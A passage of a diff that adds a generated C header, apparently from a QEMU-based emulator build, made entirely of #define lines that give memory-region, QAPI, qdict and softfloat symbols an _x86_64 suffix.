mem_begin_x86_64 +#define mem_commit mem_commit_x86_64 +#define memory_access_is_direct memory_access_is_direct_x86_64 +#define memory_access_size memory_access_size_x86_64 +#define memory_init memory_init_x86_64 +#define memory_listener_match memory_listener_match_x86_64 +#define memory_listener_register memory_listener_register_x86_64 +#define memory_listener_unregister memory_listener_unregister_x86_64 +#define memory_map_init memory_map_init_x86_64 +#define memory_mapping_filter memory_mapping_filter_x86_64 +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_x86_64 +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_x86_64 +#define memory_mapping_list_free memory_mapping_list_free_x86_64 +#define memory_mapping_list_init memory_mapping_list_init_x86_64 +#define memory_region_access_valid memory_region_access_valid_x86_64 +#define memory_region_add_subregion memory_region_add_subregion_x86_64 +#define memory_region_add_subregion_common memory_region_add_subregion_common_x86_64 +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_x86_64 +#define memory_region_big_endian memory_region_big_endian_x86_64 +#define memory_region_clear_pending memory_region_clear_pending_x86_64 +#define memory_region_del_subregion memory_region_del_subregion_x86_64 +#define memory_region_destructor_alias memory_region_destructor_alias_x86_64 +#define memory_region_destructor_none memory_region_destructor_none_x86_64 +#define memory_region_destructor_ram memory_region_destructor_ram_x86_64 +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_x86_64 +#define memory_region_dispatch_read memory_region_dispatch_read_x86_64 +#define memory_region_dispatch_read1 memory_region_dispatch_read1_x86_64 +#define memory_region_dispatch_write memory_region_dispatch_write_x86_64 +#define memory_region_escape_name memory_region_escape_name_x86_64 +#define memory_region_finalize 
memory_region_finalize_x86_64 +#define memory_region_find memory_region_find_x86_64 +#define memory_region_get_addr memory_region_get_addr_x86_64 +#define memory_region_get_alignment memory_region_get_alignment_x86_64 +#define memory_region_get_container memory_region_get_container_x86_64 +#define memory_region_get_fd memory_region_get_fd_x86_64 +#define memory_region_get_may_overlap memory_region_get_may_overlap_x86_64 +#define memory_region_get_priority memory_region_get_priority_x86_64 +#define memory_region_get_ram_addr memory_region_get_ram_addr_x86_64 +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_x86_64 +#define memory_region_get_size memory_region_get_size_x86_64 +#define memory_region_info memory_region_info_x86_64 +#define memory_region_init memory_region_init_x86_64 +#define memory_region_init_alias memory_region_init_alias_x86_64 +#define memory_region_initfn memory_region_initfn_x86_64 +#define memory_region_init_io memory_region_init_io_x86_64 +#define memory_region_init_ram memory_region_init_ram_x86_64 +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_x86_64 +#define memory_region_init_reservation memory_region_init_reservation_x86_64 +#define memory_region_is_iommu memory_region_is_iommu_x86_64 +#define memory_region_is_logging memory_region_is_logging_x86_64 +#define memory_region_is_mapped memory_region_is_mapped_x86_64 +#define memory_region_is_ram memory_region_is_ram_x86_64 +#define memory_region_is_rom memory_region_is_rom_x86_64 +#define memory_region_is_romd memory_region_is_romd_x86_64 +#define memory_region_is_skip_dump memory_region_is_skip_dump_x86_64 +#define memory_region_is_unassigned memory_region_is_unassigned_x86_64 +#define memory_region_name memory_region_name_x86_64 +#define memory_region_need_escape memory_region_need_escape_x86_64 +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_x86_64 +#define memory_region_oldmmio_write_accessor 
memory_region_oldmmio_write_accessor_x86_64 +#define memory_region_present memory_region_present_x86_64 +#define memory_region_read_accessor memory_region_read_accessor_x86_64 +#define memory_region_readd_subregion memory_region_readd_subregion_x86_64 +#define memory_region_ref memory_region_ref_x86_64 +#define memory_region_resolve_container memory_region_resolve_container_x86_64 +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_x86_64 +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_x86_64 +#define memory_region_set_address memory_region_set_address_x86_64 +#define memory_region_set_alias_offset memory_region_set_alias_offset_x86_64 +#define memory_region_set_enabled memory_region_set_enabled_x86_64 +#define memory_region_set_readonly memory_region_set_readonly_x86_64 +#define memory_region_set_skip_dump memory_region_set_skip_dump_x86_64 +#define memory_region_size memory_region_size_x86_64 +#define memory_region_to_address_space memory_region_to_address_space_x86_64 +#define memory_region_transaction_begin memory_region_transaction_begin_x86_64 +#define memory_region_transaction_commit memory_region_transaction_commit_x86_64 +#define memory_region_unref memory_region_unref_x86_64 +#define memory_region_update_container_subregions memory_region_update_container_subregions_x86_64 +#define memory_region_write_accessor memory_region_write_accessor_x86_64 +#define memory_region_wrong_endianness memory_region_wrong_endianness_x86_64 +#define memory_try_enable_merging memory_try_enable_merging_x86_64 +#define module_call_init module_call_init_x86_64 +#define module_load module_load_x86_64 +#define mpidr_cp_reginfo mpidr_cp_reginfo_x86_64 +#define mpidr_read mpidr_read_x86_64 +#define msr_mask msr_mask_x86_64 +#define mul128By64To192 mul128By64To192_x86_64 +#define mul128To256 mul128To256_x86_64 +#define mul64To128 mul64To128_x86_64 +#define muldiv64 muldiv64_x86_64 +#define neon_2rm_is_float_op 
neon_2rm_is_float_op_x86_64 +#define neon_2rm_sizes neon_2rm_sizes_x86_64 +#define neon_3r_sizes neon_3r_sizes_x86_64 +#define neon_get_scalar neon_get_scalar_x86_64 +#define neon_load_reg neon_load_reg_x86_64 +#define neon_load_reg64 neon_load_reg64_x86_64 +#define neon_load_scratch neon_load_scratch_x86_64 +#define neon_ls_element_type neon_ls_element_type_x86_64 +#define neon_reg_offset neon_reg_offset_x86_64 +#define neon_store_reg neon_store_reg_x86_64 +#define neon_store_reg64 neon_store_reg64_x86_64 +#define neon_store_scratch neon_store_scratch_x86_64 +#define new_ldst_label new_ldst_label_x86_64 +#define next_list next_list_x86_64 +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_x86_64 +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_x86_64 +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_x86_64 +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_x86_64 +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_x86_64 +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_x86_64 +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_x86_64 +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_x86_64 +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_x86_64 +#define not_v6_cp_reginfo not_v6_cp_reginfo_x86_64 +#define not_v7_cp_reginfo not_v7_cp_reginfo_x86_64 +#define not_v8_cp_reginfo not_v8_cp_reginfo_x86_64 +#define object_child_foreach object_child_foreach_x86_64 +#define object_class_foreach object_class_foreach_x86_64 +#define object_class_foreach_tramp object_class_foreach_tramp_x86_64 +#define object_class_get_list object_class_get_list_x86_64 +#define object_class_get_list_tramp object_class_get_list_tramp_x86_64 +#define object_class_get_parent object_class_get_parent_x86_64 +#define object_deinit object_deinit_x86_64 +#define object_dynamic_cast object_dynamic_cast_x86_64 +#define object_finalize object_finalize_x86_64 +#define 
object_finalize_child_property object_finalize_child_property_x86_64 +#define object_get_child_property object_get_child_property_x86_64 +#define object_get_link_property object_get_link_property_x86_64 +#define object_get_root object_get_root_x86_64 +#define object_initialize_with_type object_initialize_with_type_x86_64 +#define object_init_with_type object_init_with_type_x86_64 +#define object_instance_init object_instance_init_x86_64 +#define object_new_with_type object_new_with_type_x86_64 +#define object_post_init_with_type object_post_init_with_type_x86_64 +#define object_property_add_alias object_property_add_alias_x86_64 +#define object_property_add_link object_property_add_link_x86_64 +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_x86_64 +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_x86_64 +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_x86_64 +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_x86_64 +#define object_property_allow_set_link object_property_allow_set_link_x86_64 +#define object_property_del object_property_del_x86_64 +#define object_property_del_all object_property_del_all_x86_64 +#define object_property_find object_property_find_x86_64 +#define object_property_get object_property_get_x86_64 +#define object_property_get_bool object_property_get_bool_x86_64 +#define object_property_get_int object_property_get_int_x86_64 +#define object_property_get_link object_property_get_link_x86_64 +#define object_property_get_qobject object_property_get_qobject_x86_64 +#define object_property_get_str object_property_get_str_x86_64 +#define object_property_get_type object_property_get_type_x86_64 +#define object_property_is_child object_property_is_child_x86_64 +#define object_property_set object_property_set_x86_64 +#define object_property_set_description object_property_set_description_x86_64 +#define object_property_set_link object_property_set_link_x86_64 +#define 
object_property_set_qobject object_property_set_qobject_x86_64 +#define object_release_link_property object_release_link_property_x86_64 +#define object_resolve_abs_path object_resolve_abs_path_x86_64 +#define object_resolve_child_property object_resolve_child_property_x86_64 +#define object_resolve_link object_resolve_link_x86_64 +#define object_resolve_link_property object_resolve_link_property_x86_64 +#define object_resolve_partial_path object_resolve_partial_path_x86_64 +#define object_resolve_path object_resolve_path_x86_64 +#define object_resolve_path_component object_resolve_path_component_x86_64 +#define object_resolve_path_type object_resolve_path_type_x86_64 +#define object_set_link_property object_set_link_property_x86_64 +#define object_unparent object_unparent_x86_64 +#define omap_cachemaint_write omap_cachemaint_write_x86_64 +#define omap_cp_reginfo omap_cp_reginfo_x86_64 +#define omap_threadid_write omap_threadid_write_x86_64 +#define omap_ticonfig_write omap_ticonfig_write_x86_64 +#define omap_wfi_write omap_wfi_write_x86_64 +#define op_bits op_bits_x86_64 +#define open_modeflags open_modeflags_x86_64 +#define op_to_mov op_to_mov_x86_64 +#define op_to_movi op_to_movi_x86_64 +#define output_type_enum output_type_enum_x86_64 +#define packFloat128 packFloat128_x86_64 +#define packFloat16 packFloat16_x86_64 +#define packFloat32 packFloat32_x86_64 +#define packFloat64 packFloat64_x86_64 +#define packFloatx80 packFloatx80_x86_64 +#define page_find page_find_x86_64 +#define page_find_alloc page_find_alloc_x86_64 +#define page_flush_tb page_flush_tb_x86_64 +#define page_flush_tb_1 page_flush_tb_1_x86_64 +#define page_init page_init_x86_64 +#define page_size_init page_size_init_x86_64 +#define par par_x86_64 +#define parse_array parse_array_x86_64 +#define parse_error parse_error_x86_64 +#define parse_escape parse_escape_x86_64 +#define parse_keyword parse_keyword_x86_64 +#define parse_literal parse_literal_x86_64 +#define parse_object parse_object_x86_64 
+#define parse_optional parse_optional_x86_64 +#define parse_option_bool parse_option_bool_x86_64 +#define parse_option_number parse_option_number_x86_64 +#define parse_option_size parse_option_size_x86_64 +#define parse_pair parse_pair_x86_64 +#define parser_context_free parser_context_free_x86_64 +#define parser_context_new parser_context_new_x86_64 +#define parser_context_peek_token parser_context_peek_token_x86_64 +#define parser_context_pop_token parser_context_pop_token_x86_64 +#define parser_context_restore parser_context_restore_x86_64 +#define parser_context_save parser_context_save_x86_64 +#define parse_str parse_str_x86_64 +#define parse_type_bool parse_type_bool_x86_64 +#define parse_type_int parse_type_int_x86_64 +#define parse_type_number parse_type_number_x86_64 +#define parse_type_size parse_type_size_x86_64 +#define parse_type_str parse_type_str_x86_64 +#define parse_value parse_value_x86_64 +#define par_write par_write_x86_64 +#define patch_reloc patch_reloc_x86_64 +#define phys_map_node_alloc phys_map_node_alloc_x86_64 +#define phys_map_node_reserve phys_map_node_reserve_x86_64 +#define phys_mem_alloc phys_mem_alloc_x86_64 +#define phys_mem_set_alloc phys_mem_set_alloc_x86_64 +#define phys_page_compact phys_page_compact_x86_64 +#define phys_page_compact_all phys_page_compact_all_x86_64 +#define phys_page_find phys_page_find_x86_64 +#define phys_page_set phys_page_set_x86_64 +#define phys_page_set_level phys_page_set_level_x86_64 +#define phys_section_add phys_section_add_x86_64 +#define phys_section_destroy phys_section_destroy_x86_64 +#define phys_sections_free phys_sections_free_x86_64 +#define pickNaN pickNaN_x86_64 +#define pickNaNMulAdd pickNaNMulAdd_x86_64 +#define pmccfiltr_write pmccfiltr_write_x86_64 +#define pmccntr_read pmccntr_read_x86_64 +#define pmccntr_sync pmccntr_sync_x86_64 +#define pmccntr_write pmccntr_write_x86_64 +#define pmccntr_write32 pmccntr_write32_x86_64 +#define pmcntenclr_write pmcntenclr_write_x86_64 +#define 
pmcntenset_write pmcntenset_write_x86_64 +#define pmcr_write pmcr_write_x86_64 +#define pmintenclr_write pmintenclr_write_x86_64 +#define pmintenset_write pmintenset_write_x86_64 +#define pmovsr_write pmovsr_write_x86_64 +#define pmreg_access pmreg_access_x86_64 +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_x86_64 +#define pmsav5_data_ap_read pmsav5_data_ap_read_x86_64 +#define pmsav5_data_ap_write pmsav5_data_ap_write_x86_64 +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_x86_64 +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_x86_64 +#define pmuserenr_write pmuserenr_write_x86_64 +#define pmxevtyper_write pmxevtyper_write_x86_64 +#define print_type_bool print_type_bool_x86_64 +#define print_type_int print_type_int_x86_64 +#define print_type_number print_type_number_x86_64 +#define print_type_size print_type_size_x86_64 +#define print_type_str print_type_str_x86_64 +#define propagateFloat128NaN propagateFloat128NaN_x86_64 +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_x86_64 +#define propagateFloat32NaN propagateFloat32NaN_x86_64 +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_x86_64 +#define propagateFloat64NaN propagateFloat64NaN_x86_64 +#define propagateFloatx80NaN propagateFloatx80NaN_x86_64 +#define property_get_alias property_get_alias_x86_64 +#define property_get_bool property_get_bool_x86_64 +#define property_get_str property_get_str_x86_64 +#define property_get_uint16_ptr property_get_uint16_ptr_x86_64 +#define property_get_uint32_ptr property_get_uint32_ptr_x86_64 +#define property_get_uint64_ptr property_get_uint64_ptr_x86_64 +#define property_get_uint8_ptr property_get_uint8_ptr_x86_64 +#define property_release_alias property_release_alias_x86_64 +#define property_release_bool property_release_bool_x86_64 +#define property_release_str property_release_str_x86_64 +#define property_resolve_alias property_resolve_alias_x86_64 +#define property_set_alias property_set_alias_x86_64 +#define property_set_bool 
property_set_bool_x86_64 +#define property_set_str property_set_str_x86_64 +#define pstate_read pstate_read_x86_64 +#define pstate_write pstate_write_x86_64 +#define pxa250_initfn pxa250_initfn_x86_64 +#define pxa255_initfn pxa255_initfn_x86_64 +#define pxa260_initfn pxa260_initfn_x86_64 +#define pxa261_initfn pxa261_initfn_x86_64 +#define pxa262_initfn pxa262_initfn_x86_64 +#define pxa270a0_initfn pxa270a0_initfn_x86_64 +#define pxa270a1_initfn pxa270a1_initfn_x86_64 +#define pxa270b0_initfn pxa270b0_initfn_x86_64 +#define pxa270b1_initfn pxa270b1_initfn_x86_64 +#define pxa270c0_initfn pxa270c0_initfn_x86_64 +#define pxa270c5_initfn pxa270c5_initfn_x86_64 +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_x86_64 +#define qapi_dealloc_end_list qapi_dealloc_end_list_x86_64 +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_x86_64 +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_x86_64 +#define qapi_dealloc_next_list qapi_dealloc_next_list_x86_64 +#define qapi_dealloc_pop qapi_dealloc_pop_x86_64 +#define qapi_dealloc_push qapi_dealloc_push_x86_64 +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_x86_64 +#define qapi_dealloc_start_list qapi_dealloc_start_list_x86_64 +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_x86_64 +#define qapi_dealloc_start_union qapi_dealloc_start_union_x86_64 +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_x86_64 +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_x86_64 +#define qapi_dealloc_type_int qapi_dealloc_type_int_x86_64 +#define qapi_dealloc_type_number qapi_dealloc_type_number_x86_64 +#define qapi_dealloc_type_size qapi_dealloc_type_size_x86_64 +#define qapi_dealloc_type_str qapi_dealloc_type_str_x86_64 +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_x86_64 +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_x86_64 +#define qapi_free_boolList qapi_free_boolList_x86_64 +#define qapi_free_ErrorClassList 
qapi_free_ErrorClassList_x86_64 +#define qapi_free_int16List qapi_free_int16List_x86_64 +#define qapi_free_int32List qapi_free_int32List_x86_64 +#define qapi_free_int64List qapi_free_int64List_x86_64 +#define qapi_free_int8List qapi_free_int8List_x86_64 +#define qapi_free_intList qapi_free_intList_x86_64 +#define qapi_free_numberList qapi_free_numberList_x86_64 +#define qapi_free_strList qapi_free_strList_x86_64 +#define qapi_free_uint16List qapi_free_uint16List_x86_64 +#define qapi_free_uint32List qapi_free_uint32List_x86_64 +#define qapi_free_uint64List qapi_free_uint64List_x86_64 +#define qapi_free_uint8List qapi_free_uint8List_x86_64 +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_x86_64 +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_x86_64 +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_x86_64 +#define qbool_destroy_obj qbool_destroy_obj_x86_64 +#define qbool_from_int qbool_from_int_x86_64 +#define qbool_get_int qbool_get_int_x86_64 +#define qbool_type qbool_type_x86_64 +#define qbus_create qbus_create_x86_64 +#define qbus_create_inplace qbus_create_inplace_x86_64 +#define qbus_finalize qbus_finalize_x86_64 +#define qbus_initfn qbus_initfn_x86_64 +#define qbus_realize qbus_realize_x86_64 +#define qdev_create qdev_create_x86_64 +#define qdev_get_type qdev_get_type_x86_64 +#define qdev_register_types qdev_register_types_x86_64 +#define qdev_set_parent_bus qdev_set_parent_bus_x86_64 +#define qdev_try_create qdev_try_create_x86_64 +#define qdict_add_key qdict_add_key_x86_64 +#define qdict_array_split qdict_array_split_x86_64 +#define qdict_clone_shallow qdict_clone_shallow_x86_64 +#define qdict_del qdict_del_x86_64 +#define qdict_destroy_obj qdict_destroy_obj_x86_64 +#define qdict_entry_key qdict_entry_key_x86_64 +#define qdict_entry_value qdict_entry_value_x86_64 +#define qdict_extract_subqdict qdict_extract_subqdict_x86_64 +#define qdict_find qdict_find_x86_64 +#define qdict_first 
qdict_first_x86_64 +#define qdict_flatten qdict_flatten_x86_64 +#define qdict_flatten_qdict qdict_flatten_qdict_x86_64 +#define qdict_flatten_qlist qdict_flatten_qlist_x86_64 +#define qdict_get qdict_get_x86_64 +#define qdict_get_bool qdict_get_bool_x86_64 +#define qdict_get_double qdict_get_double_x86_64 +#define qdict_get_int qdict_get_int_x86_64 +#define qdict_get_obj qdict_get_obj_x86_64 +#define qdict_get_qdict qdict_get_qdict_x86_64 +#define qdict_get_qlist qdict_get_qlist_x86_64 +#define qdict_get_str qdict_get_str_x86_64 +#define qdict_get_try_bool qdict_get_try_bool_x86_64 +#define qdict_get_try_int qdict_get_try_int_x86_64 +#define qdict_get_try_str qdict_get_try_str_x86_64 +#define qdict_haskey qdict_haskey_x86_64 +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_x86_64 +#define qdict_iter qdict_iter_x86_64 +#define qdict_join qdict_join_x86_64 +#define qdict_new qdict_new_x86_64 +#define qdict_next qdict_next_x86_64 +#define qdict_next_entry qdict_next_entry_x86_64 +#define qdict_put_obj qdict_put_obj_x86_64 +#define qdict_size qdict_size_x86_64 +#define qdict_type qdict_type_x86_64 +#define qemu_clock_get_us qemu_clock_get_us_x86_64 +#define qemu_clock_ptr qemu_clock_ptr_x86_64 +#define qemu_clocks qemu_clocks_x86_64 +#define qemu_get_cpu qemu_get_cpu_x86_64 +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_x86_64 +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_x86_64 +#define qemu_get_ram_block qemu_get_ram_block_x86_64 +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_x86_64 +#define qemu_get_ram_fd qemu_get_ram_fd_x86_64 +#define qemu_get_ram_ptr qemu_get_ram_ptr_x86_64 +#define qemu_host_page_mask qemu_host_page_mask_x86_64 +#define qemu_host_page_size qemu_host_page_size_x86_64 +#define qemu_init_vcpu qemu_init_vcpu_x86_64 +#define qemu_ld_helpers qemu_ld_helpers_x86_64 +#define qemu_log_close qemu_log_close_x86_64 +#define qemu_log_enabled qemu_log_enabled_x86_64 
+#define qemu_log_flush qemu_log_flush_x86_64 +#define qemu_loglevel_mask qemu_loglevel_mask_x86_64 +#define qemu_log_vprintf qemu_log_vprintf_x86_64 +#define qemu_oom_check qemu_oom_check_x86_64 +#define qemu_parse_fd qemu_parse_fd_x86_64 +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_x86_64 +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_x86_64 +#define qemu_ram_alloc qemu_ram_alloc_x86_64 +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_x86_64 +#define qemu_ram_foreach_block qemu_ram_foreach_block_x86_64 +#define qemu_ram_free qemu_ram_free_x86_64 +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_x86_64 +#define qemu_ram_ptr_length qemu_ram_ptr_length_x86_64 +#define qemu_ram_remap qemu_ram_remap_x86_64 +#define qemu_ram_setup_dump qemu_ram_setup_dump_x86_64 +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_x86_64 +#define qemu_real_host_page_size qemu_real_host_page_size_x86_64 +#define qemu_st_helpers qemu_st_helpers_x86_64 +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_x86_64 +#define qemu_try_memalign qemu_try_memalign_x86_64 +#define qentry_destroy qentry_destroy_x86_64 +#define qerror_human qerror_human_x86_64 +#define qerror_report qerror_report_x86_64 +#define qerror_report_err qerror_report_err_x86_64 +#define qfloat_destroy_obj qfloat_destroy_obj_x86_64 +#define qfloat_from_double qfloat_from_double_x86_64 +#define qfloat_get_double qfloat_get_double_x86_64 +#define qfloat_type qfloat_type_x86_64 +#define qint_destroy_obj qint_destroy_obj_x86_64 +#define qint_from_int qint_from_int_x86_64 +#define qint_get_int qint_get_int_x86_64 +#define qint_type qint_type_x86_64 +#define qlist_append_obj qlist_append_obj_x86_64 +#define qlist_copy qlist_copy_x86_64 +#define qlist_copy_elem qlist_copy_elem_x86_64 +#define qlist_destroy_obj qlist_destroy_obj_x86_64 +#define qlist_empty qlist_empty_x86_64 +#define qlist_entry_obj qlist_entry_obj_x86_64 +#define qlist_first qlist_first_x86_64 +#define qlist_iter 
qlist_iter_x86_64 +#define qlist_new qlist_new_x86_64 +#define qlist_next qlist_next_x86_64 +#define qlist_peek qlist_peek_x86_64 +#define qlist_pop qlist_pop_x86_64 +#define qlist_size qlist_size_x86_64 +#define qlist_size_iter qlist_size_iter_x86_64 +#define qlist_type qlist_type_x86_64 +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_x86_64 +#define qmp_input_end_list qmp_input_end_list_x86_64 +#define qmp_input_end_struct qmp_input_end_struct_x86_64 +#define qmp_input_get_next_type qmp_input_get_next_type_x86_64 +#define qmp_input_get_object qmp_input_get_object_x86_64 +#define qmp_input_get_visitor qmp_input_get_visitor_x86_64 +#define qmp_input_next_list qmp_input_next_list_x86_64 +#define qmp_input_optional qmp_input_optional_x86_64 +#define qmp_input_pop qmp_input_pop_x86_64 +#define qmp_input_push qmp_input_push_x86_64 +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_x86_64 +#define qmp_input_start_list qmp_input_start_list_x86_64 +#define qmp_input_start_struct qmp_input_start_struct_x86_64 +#define qmp_input_type_bool qmp_input_type_bool_x86_64 +#define qmp_input_type_int qmp_input_type_int_x86_64 +#define qmp_input_type_number qmp_input_type_number_x86_64 +#define qmp_input_type_str qmp_input_type_str_x86_64 +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_x86_64 +#define qmp_input_visitor_new qmp_input_visitor_new_x86_64 +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_x86_64 +#define qmp_output_add_obj qmp_output_add_obj_x86_64 +#define qmp_output_end_list qmp_output_end_list_x86_64 +#define qmp_output_end_struct qmp_output_end_struct_x86_64 +#define qmp_output_first qmp_output_first_x86_64 +#define qmp_output_get_qobject qmp_output_get_qobject_x86_64 +#define qmp_output_get_visitor qmp_output_get_visitor_x86_64 +#define qmp_output_last qmp_output_last_x86_64 +#define qmp_output_next_list qmp_output_next_list_x86_64 +#define qmp_output_pop qmp_output_pop_x86_64 +#define 
qmp_output_push_obj qmp_output_push_obj_x86_64 +#define qmp_output_start_list qmp_output_start_list_x86_64 +#define qmp_output_start_struct qmp_output_start_struct_x86_64 +#define qmp_output_type_bool qmp_output_type_bool_x86_64 +#define qmp_output_type_int qmp_output_type_int_x86_64 +#define qmp_output_type_number qmp_output_type_number_x86_64 +#define qmp_output_type_str qmp_output_type_str_x86_64 +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_x86_64 +#define qmp_output_visitor_new qmp_output_visitor_new_x86_64 +#define qobject_decref qobject_decref_x86_64 +#define qobject_to_qbool qobject_to_qbool_x86_64 +#define qobject_to_qdict qobject_to_qdict_x86_64 +#define qobject_to_qfloat qobject_to_qfloat_x86_64 +#define qobject_to_qint qobject_to_qint_x86_64 +#define qobject_to_qlist qobject_to_qlist_x86_64 +#define qobject_to_qstring qobject_to_qstring_x86_64 +#define qobject_type qobject_type_x86_64 +#define qstring_append qstring_append_x86_64 +#define qstring_append_chr qstring_append_chr_x86_64 +#define qstring_append_int qstring_append_int_x86_64 +#define qstring_destroy_obj qstring_destroy_obj_x86_64 +#define qstring_from_escaped_str qstring_from_escaped_str_x86_64 +#define qstring_from_str qstring_from_str_x86_64 +#define qstring_from_substr qstring_from_substr_x86_64 +#define qstring_get_length qstring_get_length_x86_64 +#define qstring_get_str qstring_get_str_x86_64 +#define qstring_new qstring_new_x86_64 +#define qstring_type qstring_type_x86_64 +#define ram_block_add ram_block_add_x86_64 +#define ram_size ram_size_x86_64 +#define range_compare range_compare_x86_64 +#define range_covers_byte range_covers_byte_x86_64 +#define range_get_last range_get_last_x86_64 +#define range_merge range_merge_x86_64 +#define ranges_can_merge ranges_can_merge_x86_64 +#define raw_read raw_read_x86_64 +#define raw_write raw_write_x86_64 +#define rcon rcon_x86_64 +#define read_raw_cp_reg read_raw_cp_reg_x86_64 +#define recip_estimate recip_estimate_x86_64 
+#define recip_sqrt_estimate recip_sqrt_estimate_x86_64 +#define register_cp_regs_for_features register_cp_regs_for_features_x86_64 +#define register_multipage register_multipage_x86_64 +#define register_subpage register_subpage_x86_64 +#define register_tm_clones register_tm_clones_x86_64 +#define register_types_object register_types_object_x86_64 +#define regnames regnames_x86_64 +#define render_memory_region render_memory_region_x86_64 +#define reset_all_temps reset_all_temps_x86_64 +#define reset_temp reset_temp_x86_64 +#define rol32 rol32_x86_64 +#define rol64 rol64_x86_64 +#define ror32 ror32_x86_64 +#define ror64 ror64_x86_64 +#define roundAndPackFloat128 roundAndPackFloat128_x86_64 +#define roundAndPackFloat16 roundAndPackFloat16_x86_64 +#define roundAndPackFloat32 roundAndPackFloat32_x86_64 +#define roundAndPackFloat64 roundAndPackFloat64_x86_64 +#define roundAndPackFloatx80 roundAndPackFloatx80_x86_64 +#define roundAndPackInt32 roundAndPackInt32_x86_64 +#define roundAndPackInt64 roundAndPackInt64_x86_64 +#define roundAndPackUint64 roundAndPackUint64_x86_64 +#define round_to_inf round_to_inf_x86_64 +#define run_on_cpu run_on_cpu_x86_64 +#define s0 s0_x86_64 +#define S0 S0_x86_64 +#define s1 s1_x86_64 +#define S1 S1_x86_64 +#define sa1100_initfn sa1100_initfn_x86_64 +#define sa1110_initfn sa1110_initfn_x86_64 +#define save_globals save_globals_x86_64 +#define scr_write scr_write_x86_64 +#define sctlr_write sctlr_write_x86_64 +#define set_bit set_bit_x86_64 +#define set_bits set_bits_x86_64 +#define set_default_nan_mode set_default_nan_mode_x86_64 +#define set_feature set_feature_x86_64 +#define set_float_detect_tininess set_float_detect_tininess_x86_64 +#define set_float_exception_flags set_float_exception_flags_x86_64 +#define set_float_rounding_mode set_float_rounding_mode_x86_64 +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_x86_64 +#define set_flush_to_zero set_flush_to_zero_x86_64 +#define set_swi_errno set_swi_errno_x86_64 +#define 
sextract32 sextract32_x86_64 +#define sextract64 sextract64_x86_64 +#define shift128ExtraRightJamming shift128ExtraRightJamming_x86_64 +#define shift128Right shift128Right_x86_64 +#define shift128RightJamming shift128RightJamming_x86_64 +#define shift32RightJamming shift32RightJamming_x86_64 +#define shift64ExtraRightJamming shift64ExtraRightJamming_x86_64 +#define shift64RightJamming shift64RightJamming_x86_64 +#define shifter_out_im shifter_out_im_x86_64 +#define shortShift128Left shortShift128Left_x86_64 +#define shortShift192Left shortShift192Left_x86_64 +#define simple_mpu_ap_bits simple_mpu_ap_bits_x86_64 +#define size_code_gen_buffer size_code_gen_buffer_x86_64 +#define softmmu_lock_user softmmu_lock_user_x86_64 +#define softmmu_lock_user_string softmmu_lock_user_string_x86_64 +#define softmmu_tget32 softmmu_tget32_x86_64 +#define softmmu_tget8 softmmu_tget8_x86_64 +#define softmmu_tput32 softmmu_tput32_x86_64 +#define softmmu_unlock_user softmmu_unlock_user_x86_64 +#define sort_constraints sort_constraints_x86_64 +#define sp_el0_access sp_el0_access_x86_64 +#define spsel_read spsel_read_x86_64 +#define spsel_write spsel_write_x86_64 +#define start_list start_list_x86_64 +#define stb_p stb_p_x86_64 +#define stb_phys stb_phys_x86_64 +#define stl_be_p stl_be_p_x86_64 +#define stl_be_phys stl_be_phys_x86_64 +#define stl_he_p stl_he_p_x86_64 +#define stl_le_p stl_le_p_x86_64 +#define stl_le_phys stl_le_phys_x86_64 +#define stl_phys stl_phys_x86_64 +#define stl_phys_internal 